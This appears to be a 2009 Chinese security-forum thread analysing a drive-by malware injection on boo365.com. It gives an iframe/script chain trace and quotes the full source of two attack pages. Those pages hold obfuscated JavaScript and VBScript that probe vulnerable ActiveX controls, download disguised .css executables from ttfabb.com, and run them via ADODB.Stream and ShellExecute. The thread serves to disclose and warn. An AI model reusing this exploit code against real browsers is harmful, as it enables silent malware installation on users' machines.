http://www.boo365.com

Mr.Z

掛馬

Log is generated by FreShow.
[wide]http://www.boo365.com
    [script]http://boo365.com/FS_Inc/Prototype.js
    [frame]http://www.boo365.com/jf_new/92.html
        [script]http://pageads2.googlesnations.cn/show_ads.js
            [frame]http://go.keke03.cn/w04/w04.htm
                [frame]http://go.keke03.cn/w04/new.html
                    [frame]http://go.keke03.cn/w04/../as.htm
                        [object]http://wwww.ttfabb.com/wl.css
                    [frame]http://go.keke03.cn/w04/for.htm
                        [object]http://wwww.ttfabb.com/w04.css
                    [frame]http://go.keke03.cn/w04/../gword.htm
                    [frame]http://go.keke03.cn/w04/../baozi.htm
                    [frame]http://go.keke03.cn/w04/../all10.htm
                    [frame]http://go.keke03.cn/w04/../all11.htm
                    [script]http://go.keke03.cn/w04/new.js
                    [frame]http://go.keke03.cn/w04/fcx.htmdth=100
                    [frame]http://go.keke03.cn/w04/../supp.htm
                [script]http://go.keke03.cn/w04/\"http:\/\/js.t0ngji.cn.yahoo.com\/841705\/ystat.js\"
                [script]http://go.keke03.cn/w04/\"http:\/\/js.tongji.cn.yahoo.com\/841705\/ystat.js\"
                [script]http://count1.51much.com/cnt.php?uid=UA-1-12435&style=icon&logo=1
            [frame]http://pagead2.googlenations.cn/51.html
    [script]http://s27.cnzz.com/stat.php?id=602228&web_id=602228
    [script]http://count42.51yes.com/click.aspx?id=425911119&logo=12
    [script]http://boo365.com/live/OL/index_bffd.js
    [script]http://pageads2.googlesnations.cn/show_ads.js

主站进去现在变得要密码了....


hXXp://go.keke03.cn/w04/new.html

<SCRIPT>window.onerror=function(){
      return true;
    }
      </SCRIPT><SCRIPT>window.defaultStatus=".";
    try{
      if(new ActiveXObject("snpvw.Snapshot Viewer Control.1"))document.write('<iframe width=100 height=0 src=../as.htm></iframe>')}
      catch(a){
      }
      try{
      var b;
    var gw=new ActiveXObject("Downloader.DLoader.1")}
      catch(b){
      }
      ;
    finally{
      if(b!="[object Error]"){
      document.write('<object classid="clsid:78ABDC59-D8E7-44D3-9A76-9A0918C52B4A" id="install" width=0 height=0></object>');
    install["DownloadAndInstall"]("hxxp://wwww.ttfabb.com/wl.css")}
      }
      try{
      var e;
    var fderer="dfk#*&$FEFsdfdsfds";
    var ado=document.createElement("object");
    if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
    var as=ado.createobject("Adodb.Stream","")}
      catch(e){
      }
      ;
    finally{
      if(e!="[object Error]"){
      document.write('<iframe width=100 height=0 src=for.htm></iframe>')}
      else{
      try{
      var g;
    var storm=new ActiveXObject("UUUPGRADE.UUUpgradeCtrl.1")}
      catch(g){
      }
      ;
    finally{
      if(g!="[object Error]"){
      var url="http://wwww.ttfabb.com/";
    storm=document.createElement("object");
    ActivePerl="-1C59-4BBB-8E8";
    getSpraySlide="1-6E83F82C813B";
    helloworld2Address="clsid:2CACD7BB";
    storm.setAttribute("classid",helloworld2Address+ActivePerl+getSpraySlide);
    storm["Update"]("\\Program Files\\Common Files\\uusee\\",url+"UU.ini","",1)}
      }
      try{
      var h;
    var glworld=new ActiveXObject("GLIEDown.IEDown.1")}
      catch(h){
      }
      ;
    finally{
      if(h!="[object Error]"){
      document.write('<iframe style=display:none src="../gword.htm"></iframe>')}
      }
      try{
      var bf;
    var bfworld=new ActiveXObject("MPS.StormPlayer")}
      catch(bf){
      }
      ;
    finally{
      if(bf!="[object Error]"){
      document.write('<iframe style=display:none src="../baozi.htm"></iframe>')}
      }
      try{
      var i;
    var real=new ActiveXObject("IERPCtl.IERPCtl.1")}
      catch(i){
      }
      ;
    finally{
      if(i!="[object Error]"){
      if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")<="6.0.14.552"){
      document.write('<iframe width=100 height=0 src=../all10.htm></iframe>')}
      else{
      document.write('<iframe style=display:none src="../all11.htm"></iframe>')}
      }
      }
      }
      }
      </script><script src=new.js></script><iframe src=fcx.htmdth=100 height=0></iframe><iframe src=../supp.htm width=100 height=0></iframe>

hxxp://go.keke03.cn/w04/for.htm

    <html>
    <script language="VBScript">
    on error resume next
    juzippurl = "hxxp://wwww.ttfabb.com/w04.css"
    evils="cls"+"i"+"d:B"+""+""+"D96"
    juzipp="object"
    evil="C556-65A3-"
    juzipp2="classid"
    evilx=evils & evil &"11D0-983A-00C04FC29E36"
    juzipp3="Micr"+"osoft.XMLHTTP"
    juzipp4="Shell.App"+"lication"
    juzipp5="Scripting.File"+"SystemObject"
    Set e7e5l89 = document.createElement(juzipp)
    sub usicecod(juzipp4,Cutex)
    set t88p6t = e7e5l89.createobject(juzipp4,"")
    t88p6t.ShellExEcutE e7e5l89x,"","","open",0
    end sub
    e7e5l89.setAttribute juzipp2, evilx
    chilam=juzipp3
    Set wing = e7e5l89.CreateObject(chilam,"")
    User="andhi"
    Anheys="Stre"
    Anheyx="am"
    Anhey="Adodb."
    Anti = Anhey & Anheys & Anheyx
    Antivirus = Anti
    set Rising = e7e5l89.createobject(Antivirus,"")
    Rising.type = 1
    Kaspersky="GET"
    wing.Open Kaspersky, juzippurl, False
    wing.Send
    e7e5l89x="justju.sCr"
    SeT Virus = e7e5l89.createobject(juzipp5,"")
    sET t88p6t = Virus.GetSpecialFolder(2)
    Rising.open
    e7e5l89x= Virus.BuildPath(t88p6t,e7e5l89x)
    Rising.write wing.responseBody
    Rising.savetofile e7e5l89x,2
    Rising.close
    call usicecod(juzipp4,Cutex)
    </script>
    </html>
<script type="text/jscript">function init() { document.write("just......");}window.onload = init;</script>

xyao

LinkScanner

Hopesky

红伞狂跳....

css即为exe

我终于学乖了

Hopesky

css=exe？

不解ing~

改下css的后缀就是exe程序 用txt打开就知道了

ALEXBLAIR

原帖由 liujiehua 于 2009-1-24 15:18 发表
css=exe？

不解ing~

扩展名未必和内容相符。。。

具体根据对象而定